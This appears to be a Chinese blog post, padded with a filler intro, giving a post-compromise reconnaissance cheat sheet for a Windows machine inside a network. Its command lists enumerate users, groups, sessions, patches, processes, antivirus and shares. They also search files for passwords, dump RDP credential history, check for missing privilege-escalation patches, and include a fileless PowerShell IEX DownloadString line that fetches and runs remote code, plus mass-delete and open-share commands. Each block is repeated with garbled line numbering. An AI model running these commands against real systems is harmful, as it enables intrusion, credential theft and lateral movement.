前言:
而今小伙伴们对“net user查看本机账号信息”可能比较珍视,看官们都想要剖析一些“net user查看本机账号信息”的相关知识。那么小编同时在网上网罗了一些关于“net user查看本机账号信息””的相关资讯,希望姐妹们能喜欢,姐妹们一起来了解一下吧!单机基础信息搜集
拿到内网的一台机器,判断是否在域还是工作组,主机网络,运行的软件和已经安装的软件,杀软防护软件,监控软件,主机的活跃连接
域中尽可能多去搜集信息,(定位域控,寻找时间服务器,寻找邮箱服务器等,尽可能找本机的配置,和密码本等)
基础命令
whoami /user && whoami /priv && whoami /all 查看主机权限 query user | quser 查当前机器中正在线的用户,注意管理员此时在不在 cmdkey /l 远程桌面连接历史记录 把凭证取下来>本地解密 hostname 主机名字,知道当前机器是干什么的 net user 主机用户,制做用户字典 net user xxx 查看具体信息 net localgroup 查看机器中的所有组名,了解不同组的职能 net localgroup "Administrators" 查指定组中的成员列表 net accounts 查看本地密码策略 qwinsta 查看登录情况
10 1whoami /user && whoami /priv && whoami /all 查看主机权限2query user | quser 查当前机器中正在线的用户,注意管理员此时在不在3cmdkey /l 远程桌面连接历史记录 把凭证取下来•>本地解密 4hostname 主机名字,知道当前机器是干什么的5net user 主机用户,制做用户字典6net user xxx 查看具体信息7net localgroup 查看机器中的所有组名,了解不同组的职能8net localgroup "Administrators" 查指定组中的成员列表9net accounts 查看本地密码策略10qwinsta 查看登录情况
查看本机ip配置,有Primary Dns Suffix 就说明是域内. 空的则当前机器应该在工作组,还有域控一般在主dns服务器机器上,看ip
ipconfig /all 查看本机ip配置,观察本机是否在域内,内网网段,网关在哪里,看主dns判断 ipconfig /displaydns 查看本地DNS缓存
2 1ipconfig /all 查看本机ip配置,观察本机是否在域内,内网网段,网关在哪里,看主dns判断2ipconfig /displaydns 查看本地DNS缓存
查看当前机器中所有的网络连接
net start 查看本机运行的所有服务 netstat -ano 查看本机所有的tcp,udp端口连接及其对应的pid netstat -anob 需要有管理员权限 查看本机所有的tcp,udp端口连接,pid及其对应的发起程序 netstat -ano | findstr "ESTABLISHED" 查看当前正处于连接状态的端口及ip netstat -ano | find "LISTENING" 查看当前正处于监听状态的端口及ip netstat -ano | find "TIME_WAIT" 查看当前正处于等待状态的端口及ip
6 1net start 查看本机运行的所有服务2netstat -ano 查看本机所有的tcp,udp端口连接及其对应的pid3netstat -anob 需要有管理员权限 查看本机所有的tcp,udp端口连接,pid及其对应的发起程序4netstat -ano | findstr "ESTABLISHED" 查看当前正处于连接状态的端口及ip5netstat -ano | find "LISTENING" 查看当前正处于监听状态的端口及ip6netstat -ano | find "TIME_WAIT" 查看当前正处于等待状态的端口及ip
路由表
route print 打印本机路由信息,可以看到本机所有的网卡接口 netstat -r 打印本机路由信息,可以看到本机所有的网卡接口,和route print功能一样 arp -a 查找有价值的内网arp通信记录 netsh int ip delete arpcache 删除当前机器的arp缓存 tracert 8.8.8.8 跟踪本机的出口ip
5 1route print 打印本机路由信息,可以看到本机所有的网卡接口2netstat -r 打印本机路由信息,可以看到本机所有的网卡接口,和route print功能一样3arp -a 查找有价值的内网arp通信记录4netsh int ip delete arpcache 删除当前机器的arp缓存5tracert 8.8.8.8 跟踪本机的出口ip
查看系统信息.
systeminfo 查看本机的详细配置信息 systeminfo /S 192.168.1.101 /U testlab\test /P "test" 查看远程机器的系统配置 systeminfo>temp.txt&(for %i in (KB2271195 KB2124261 KB2160329 KB2621440 KB2707511 KB2829361 KB2864063 KB3000061 KB3045171 KB3036220 KB3077657 KB3079904 KB3134228 KB3124280 KB3199135) do @type temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a temp.txt 检测输出结果,快速找到未安装的可导致提权的补丁,KB号自行修改 set 查看当前机器的环境变量配置,看有没有我们可以直接利用到的语言环境 type c:\windows\system32\drivers\etc\hosts host文件 ver 查看当前机器的NT内核版本,不弹窗 winver 查看当前机器的NT内核版本,弹窗,在非图形界面不执行这个命令 fsutil fsinfo drives 列出当前机器上的所有盘符 wmic logicaldisk where drivetype=3 get deviceid #获取逻辑磁盘盘符 wmic logicaldisk where drivetype=2 get deviceid #获取移动磁盘盘符 net share 查看当前机器开启的共享 net session 查看当前会话 driverquery 查看当前机器安装的驱动列表 net share public_dir="c:\public" /grant:Everyone,Full 设置共享
17 1systeminfo 查看本机的详细配置信息2systeminfo /S 192.168.1.101 /U testlab\test /P "test" 查看远程机器的系统配置3systeminfo>temp.txt&(for %i in (KB2271195 KB2124261 KB2160329 KB2621440 KB27075114KB2829361 KB2864063 KB3000061 KB3045171 KB3036220 KB3077657 KB3079904 KB3134228 KB31242805KB3199135) do @type temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a6temp.txt 检测输出结果,快速找到未安装的可导致提权的补丁,KB号自行修改7set 查看当前机器的环境变量配置,看有没有我们可以直接利用到的语言环境8type c:\windows\system32\drivers\etc\hosts host文件9ver 查看当前机器的NT内核版本,不弹窗10winver 查看当前机器的NT内核版本,弹窗,在非图形界面不执行这个命令11fsutil fsinfo drives 列出当前机器上的所有盘符12wmic logicaldisk where drivetype=3 get deviceid #获取逻辑磁盘盘符13wmic logicaldisk where drivetype=2 get deviceid #获取移动磁盘盘符14net share 查看当前机器开启的共享15net session 查看当前会话16driverquery 查看当前机器安装的驱动列表17net share public_dir="c:\public" /grant:Everyone,Full 设置共享
查看当前系统
wmic OS get Caption,CSDVersion,OSArchitecture,Version
1 1wmic OS get Caption,CSDVersion,OSArchitecture,Version
⽂件列表
查找指定盘所有文件 dir /s /a c:\ > logc.txt dir /s /a d:\ > logd.txt 在指定目录下搜集各类敏感文件 dir /a /s /b d:\"*.txt" dir /a /s /b d:\"*.xml" dir /a /s /b d:\"*.mdb" dir /a /s /b d:\"*.sql" dir /a /s /b d:\"*.mdf" dir /a /s /b d:\"*.eml" dir /a /s /b d:\"*.pst" dir /a /s /b d:\"*conf*" dir /a /s /b d:\"*bak*" dir /a /s /b d:\"*pwd*" dir /a /s /b d:\"*pass*" dir /a /s /b d:\"*login*" dir /a /s /b d:\"*user*"
17 1查找指定盘所有文件2dir /s /a c:\ > logc.txt3dir /s /a d:\ > logd.txt4在指定目录下搜集各类敏感文件5dir /a /s /b d:\"*.txt"6dir /a /s /b d:\"*.xml"7dir /a /s /b d:\"*.mdb"8dir /a /s /b d:\"*.sql"9dir /a /s /b d:\"*.mdf"10dir /a /s /b d:\"*.eml"11dir /a /s /b d:\"*.pst"12dir /a /s /b d:\"*conf*"13dir /a /s /b d:\"*bak*"14dir /a /s /b d:\"*pwd*"15dir /a /s /b d:\"*pass*"16dir /a /s /b d:\"*login*"17dir /a /s /b d:\"*user*"
在指定目录下的文件中搜集各种账号密码
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.ba
5 1findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak2findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak3findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak4findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak5findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.ba
查看,删除 指定文件
type c:\windows\temp\admin_pass.bak 查看某个文件内容 del d:\ad\*.* /a /s /q /f 强制删除指定路径下的所有文件 tree /F /A D:\ >> file_list.txt 导出指定路径下的文件目录结构 rd /q/s c:\windows\temp\test 删除文件夹 echo 指定目录写入文件
5 1type c:\windows\temp\admin_pass.bak 查看某个文件内容2del d:\ad\*.* /a /s /q /f 强制删除指定路径下的所有文件3tree /F /A D:\ >> file_list.txt 导出指定路径下的文件目录结构4rd /q/s c:\windows\temp\test 删除文件夹5echo 指定目录写入文件
查看进程
查找某些域用户启动的程序
如果要看域机器启动的进程,需要本机为system权限
有些进程可能是域用户启的>通过管理员权限 凭证窃取 > 窃取域用户的凭证
tasklist /svc 显示当前机器所有的进程所对应的服务 [只限于当前用户有权限看到的进程] tasklist /m 显示本地所有进程所调用的dll [同样只限于当前用户有权限看到的进程] tasklist /v 寻找进程中有无 域管启用的进程 或者 杀软进程 taskkill /F /im calc.exe 用指定进程名的方式强行结束指定进程 tasklist /svc TeamService远程 tasklist /svc | find "TeamService" netstat -ano | find "pid"
6 1tasklist /svc 显示当前机器所有的进程所对应的服务 [只限于当前用户有权限看到的进程]2tasklist /m 显示本地所有进程所调用的dll [同样只限于当前用户有权限看到的进程]3tasklist /v 寻找进程中有无 域管启用的进程 或者 杀软进程4taskkill /F /im calc.exe 用指定进程名的方式强行结束指定进程5tasklist /svc TeamService远程 tasklist /svc | find "TeamService" 6netstat -ano | find "pid"
查看补丁
当前系统的补丁程序 wmic qfe get hotfixid wmic qfe get Caption,Description,HotFixID,InstalledOn wmic qfe get description,installedOn,HotFixID,InstalledBy wmic qfe get CSName,Description,hotfixid
5 1当前系统的补丁程序2wmic qfe get hotfixid 3wmic qfe get Caption,Description,HotFixID,InstalledOn 4wmic qfe get description,installedOn,HotFixID,InstalledBy5wmic qfe get CSName,Description,hotfixid
查询当前机器自启动程序有哪些
wmic startup list full wmic STARTUP GET Caption,Command,User
2 1wmic startup list full2wmic STARTUP GET Caption,Command,User
查询当前机器所安装的所有软件名
wmic product get name /value wmic product get name,version wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_Product get name 已经安装的程序[完整] 下载到本地后 powershell -exec bypass -f c:\users\public\ListInstalledPrograms.ps1 无文件 powershell IEX (New-Object Net.WebClient).DownloadString(' nstalledPrograms.ps1')
10 1wmic product get name /value2wmic product get name,version3wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_Product get name45已经安装的程序[完整]6下载到本地后7powershell -exec bypass -f c:\users\public\ListInstalledPrograms.ps18无文件9powershell IEX (New-Object Net.WebClient).DownloadString(';)查询本机所有的盘符及剩余空间
wmic logicaldisk get description,name,size,freespace /value wmic logicaldisk where drivetype=3 get name,freespace,systemname,filesystem
2 1wmic logicaldisk get description,name,size,freespace /value2wmic logicaldisk where drivetype=3 get name,freespace,systemname,filesystem
查询当前机器的简要配置信息
wmic computersystem list brief /format:lists
1 1wmic computersystem list brief /format:lists
查询当前机器的操作系统位数
wmic cpu get DataWidth /format:list
1 1wmic cpu get DataWidth /format:list
查询当前机器的用户及组信息
wmic useraccount list brief /format:list wmic group list brief /format:list wmic group get Caption, InstallDate, LocalAccount, Domain, SID, Status
3 1wmic useraccount list brief /format:list2wmic group list brief /format:list3wmic group get Caption, InstallDate, LocalAccount, Domain, SID, Status
查询当前机器所有用户的详细信息
wmic useraccount list brief
1 1wmic useraccount list brief
查询当前机器所有服务的详细状态
wmic service list brief
1 1wmic service list brief
查询指定域的域管有哪些
wmic /node:rootkit path win32_groupuser where (groupcomponent="win32_group.name=\"test\",domain=\"labtest\"")
2 1wmic /node:rootkit path win32_groupuser where2(groupcomponent="win32_group.name=\"test\",domain=\"labtest\"")
查看谁登陆过指定机器,适合用来找域管进程
wmic /node:192.168.1.100 path win32_loggedonuser get antecedent
1 1wmic /node:192.168.1.100 path win32_loggedonuser get antecedent
查询本机共享
wmic share get name,path,status
1 1wmic share get name,path,status
查杀软
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState,pathToSignedProductExe
1WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List2wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState,pathToSignedProductExe
标签: #net user查看本机账号信息
